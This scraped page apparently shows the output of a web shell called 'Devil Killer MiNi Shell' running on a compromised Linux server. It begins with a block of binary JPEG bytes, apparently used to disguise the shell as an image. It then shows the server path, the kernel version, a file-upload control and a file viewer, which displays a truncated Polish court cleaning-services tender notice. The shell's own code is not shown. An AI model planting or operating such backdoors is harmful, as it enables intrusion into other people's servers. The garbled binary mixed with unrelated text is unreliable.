JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211126/0028689301-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> KOMPLEKSOWE SPRZĄTANIE BUDYNKÓW SĄDU REJONOWEGO W WODZISŁAWIU ŚLĄSKIM PRZY ULICY: SĄDOWEJ 3, 26 MARCA 44, KS. W. KUBSZA 28B, WOJSKA POLSKEGO 16/1, WAŁOWEJ 39 WRAZ Z DEZYNFEKCJĄ. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Sąd Rejonowy w Wodzisławiu Śląskim</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000322212</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Sądowa 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wodzisław Śląski</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">44-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL227 - Rybnicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">(032) 45-91-484</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">(032) 45-91-404</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne@wodzislaw.sr.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.wodzislaw.sr.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ kontroli państwowej i ochrony prawa oraz sąd i trybunał</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> sąd powszechny </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> KOMPLEKSOWE SPRZĄTANIE BUDYNKÓW SĄDU REJONOWEGO W WODZISŁAWIU ŚLĄSKIM PRZY ULICY: SĄDOWEJ 3, 26 MARCA 44, KS. W. KUBSZA 28B, WOJSKA POLSKEGO 16/1, WAŁOWEJ 39 WRAZ Z DEZYNFEKCJĄ. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f6803876-4ec3-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00286893</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-26</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00013884/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Świadczenie usług kompleksowego sprzątania budynków Sądu Rejonowego w Wodzisławiu Śląskim wraz z dezynfekcją</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.ms.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.ms.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W<br/>postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami, w<br/>szczególności składanie ofert oraz oświadczeń, odbywa się przy użyciu środków komunikacji<br/>elektronicznej zapewnionych przez System zapewniający obsługę procesu udzielania zamówień<br/>publicznych za pośrednictwem środków komunikacji elektronicznej, zwany dalej Systemem<br/>elektronizacji.<br/>System elektronizacji jest dostępny pod adresem: https://ezamowienia.ms.gov.pl.<br/>Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta<br/>w Systemie elektronizacji, ani logowania do Systemu elektronizacji.<br/>Komunikacja Wykonawcy z Zamawiającym w postępowaniu, w szczególności: przekazywanie<br/>dokumentów, oświadczeń, informacji, pytań, wniosków w ramach postępowania odbywa się za<br/>pośrednictwem posiadanego konta Użytkownika Zewnętrznego.<br/>Komunikacja Zamawiającego z Wykonawcą w postępowaniu, w szczególności: przekazywanie<br/>wezwań i zawiadomień, informacji, odpowiedzi na pytania odbywa się w Systemie elektronizacji.<br/>Korzystanie z Systemu elektronizacji możliwe jest na dwa sposoby, pod warunkiem spełnienia<br/>następujących minimalnych wymagań technicznych:<br/>a) Oprogramowanie zewnętrzne:<br/>i. Mozilla Firefox ver. 65 i późniejsze, Google Chrome ver. 66 i późniejsze lub Opera ver. 58 i<br/>późniejsze, Microsoft Edge ver 18 i późniejsze, Internet Explorer 11<br/>ii. Lista zalecanych przeglądarek internetowych: Google Chrome, Mozilla Firefox, Opera. Zalecane jest<br/>używanie najnowszych wersji przeglądarek<br/>iii. system operacyjny Windows 7 i późniejsze<br/>b) Oprogramowanie wbudowane w System elektronizacji,<br/>i. zainstalowane środowisko Java w wersji min. 1.8 (jre)<br/>ii. w przypadku przeglądarek Opera, Chrome i Firefox należy doinstalować dodatek do przeglądarki<br/>Szafir SDK Web<br/>iii. oprogramowanie SzafirHost w systemie operacyjnym.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://ezamowienia.ms.gov.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informujemy, że:<br/>1) administratorem Pani/Pana danych osobowych jest Sąd Rejonowy w Wodzisławiu Śląskim, z<br/>siedzibą w Wodzisławiu Śl. (44-300) ul. Sądowa 3 reprezentowany przez Dyrektora Sądu Rejonowego<br/>w Wodzisławiu Ślaskim;<br/>2) administrator wyznaczył Inspektora Danych Osobowych, z którym można się kontaktować pod<br/>adresem e-mail: iod@wodzislaw.sr.gov.pl.<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego prowadzonym w trybie podstawowym.<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 74 uPzp.<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 uPzp przez okres 4 lat od<br/>dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4<br/>lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisanych uPzp, związanym z udziałem w postępowaniu o<br/>udzielenie zamówienia publicznego.<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosownie do art. 22 RODO.<br/>8) posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w<br/>przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie<br/>dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających<br/>na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie<br/>zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego<br/>postępowania o udzielenie zamówienia);<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z<br/>prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia<br/>publicznego ani zmianą postanowień umowy w zakresie niezgodnym z uPzp oraz nie może naruszać<br/>integralności protokołu oraz jego załączników);<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub<br/>konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia<br/>korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej,<br/>lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan,<br/>że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9) nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;<br/>10) przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO<br/>przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla<br/>przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">Adm.236-3/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na kilka części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> I. Zadanie 1 A i B – Kompleksowe sprzątanie budynku Sądu Rejonowego w Wodzisławiu<br/>Śląskim przy ulicy:<br/>• Zadanie 1 A: ul. Sądowej 3 – powierzchnia: 2.193,20 m2.<br/>• Zadanie 1 B: ul. Wałowej 39 (Archiwum) - powierzchnia: 150,00 m2.<br/>Szczegółowy opis znajduje się w SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90900000-6 - Usługi w zakresie sprzątania i odkażania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> I. Zadanie 2 A, B i C– Kompleksowe sprzątanie budynków Sądu Rejonowego w Wodzisławiu<br/>Śląskim przy ulicy:<br/>• Zadanie 2 A: ul. 26 Marca 44 (Wydział Ksiąg Wieczystych oraz Wydział Rodzinny)<br/>- powierzchnia: 928,20 m2<br/>• Zadanie 2 B: ul. Ks. W. Kubsza 28 B (Kuratorzy sądowi)<br/>- powierzchnia: 193,63 m2<br/>• Zadanie 2 C: ul. Wojska Polskiego 16/1 (Ośrodek Kuratorski)<br/>- powierzchnia : 76,30 m 2. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90900000-6 - Usługi w zakresie sprzątania i odkażania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na<br/>zasadach określonych w punkcie VI SWZ oraz spełniają warunki udziału w postępowaniu<br/>dotyczące:<br/>a) zdolności do występowania w obrocie gospodarczym: Zamawiający nie stawia warunku w<br/>powyższym zakresie.<br/>b) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów: Zamawiający nie stawia warunku w powyższym zakresie.<br/>c) sytuacji ekonomicznej lub finansowej – poprzez wykazanie przez Wykonawcę posiadania<br/>ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z<br/>przedmiotem zamówienia publicznego na kwotę nie mniejszą niż 250 000,00 zł.<br/>W przypadku złożenia oferty przez wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia warunek ten jest spełniony, jeżeli co najmniej jeden z wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia posiada wymaganą polisę. Wysokości ubezpieczenia<br/>nie można sumować przedstawiając kilka ubezpieczeń o mniejszych wartościach.<br/>Jeżeli wartość ubezpieczenia wyrażona będzie w innej walucie niż PLN, dla potrzeb<br/>sprawdzenia spełnienia warunku, Zamawiający przeliczy podaną przez Wykonawcę wartość<br/>według średniego kursu złotego w stosunku do walut obcych ogłoszonego przez NBP,<br/>obowiązującego na dzień, w którym zostało opublikowane ogłoszenie o zamówieniu Biuletynie<br/>Zamówień Publicznych.<br/>d) zdolności technicznej lub zawodowej poprzez wykazanie, że Wykonawca:<br/>a. w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje co najmniej: 2<br/>usługi, z których każda usługa obejmuje usługi polegające na usłudze sprzątania w budynku<br/>użyteczności publicznej* o powierzchni sprzątania min. 1 000 m2 wraz z usługami mycia okien,<br/>wykonywanych w sposób ciągły przez okres co najmniej 12 miesięcy każda, o wartości umowy:<br/>• dla Zadania 1 A i B - nie mniejszej niż 250 000,00 złotych.<br/>• dla Zadania 2 A, B i C – nie mniejszej niż 100 000,00 złotych.<br/>W przypadku usług trwających wymaga się, aby dotychczas zrealizowane usługi wypełniały<br/>powyższe warunki (powierzchnię, okres trwania oraz wartość usługi już zrealizowanej).<br/>W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający<br/>wymaga, aby 2 usługi zostały spełnione przez jednego wykonawcę (w celu wykazania zdolności<br/>powtórzenia podobnych usług przez jeden podmiot). W przypadku polegania na zasobach<br/>podmiotu trzeciego, Zamawiający wymaga aby 2 usługi w ramach pojedynczego warunku<br/>zostały spełnione przez jeden podmiot (w celu wykazania zdolności powtórzenia podobnych<br/>usług przez jeden podmiot). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Na potwierdzenie braku podstaw do wykluczenia:<br/>i. oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej<br/>samej grupy kapitałowej, w rozumieniu ustawy z dnia 16.02.2007 r. o ochronie konkurencji i<br/>konsumentów (Dz. U. z 2020 r. poz. 1076 z p. zm.), z innym wykonawcą, który złożył odrębną ofertę,<br/>ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o<br/>przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi<br/>przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu<br/>niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – Wzór oświadczenia<br/>zostanie przekazany Wykonawcy wraz z wezwaniem.<br/>ii. zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie<br/>zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy Pzp, wystawionego nie<br/>wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub<br/>opłat wraz z zaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających, że przed<br/>upływem terminu składania ofert wykonawca dokonał płatności należnych podatków lub opłat wraz z<br/>odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/>iii. zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnej Zakładu<br/>Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej<br/>Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z<br/>opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 ustawy<br/>Pzp, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z<br/>opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym<br/>dokumentem zamawiający żąda złożenia dokumentów potwierdzających, że przed upływem terminu<br/>składania ofert wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub<br/>zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych<br/>należności;<br/>iv. odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej<br/>niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>v. informacja z Krajowego Rejestru Karnego w zakresie dotyczącym podstaw wykluczenia wskazanych<br/>w art. 108 ust. 1 pkt 1, 2 i 4 ustawy Pzp. Sporządzona nie wcześniej niż 6 miesięcy przed jej złożeniem;<br/>vi. oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art.<br/>125 ust. 1 ustawy Pzp w zakresie odnoszącym się do podstaw wykluczenia wskazanych w art. 108 ust.<br/>1 pkt 3-6 ustawy pzp oraz w zakresie podstaw wykluczenia wskazanych w art. 109 ust. 1 pkt 1 ustawy<br/>Pzp odnośnie do naruszenia obowiązków dotyczących płatności podatków i opłat lokalnych, o których<br/>mowa w ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach lokalnych (Dz. U. 